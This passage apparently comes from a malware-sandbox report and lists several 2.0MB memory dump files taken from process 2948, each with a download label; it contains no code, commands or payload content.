2.0MB

Download
memory/2948-72-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2948-134-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2948-135-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2948-109-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2948-137-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2948-138-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2948-139-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2948-140-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2948-141-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2948-142-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download
memory/2948-143-0x0000000000400000-0x00000000005FF000-memory.dmp

Filesize
2.0MB

Download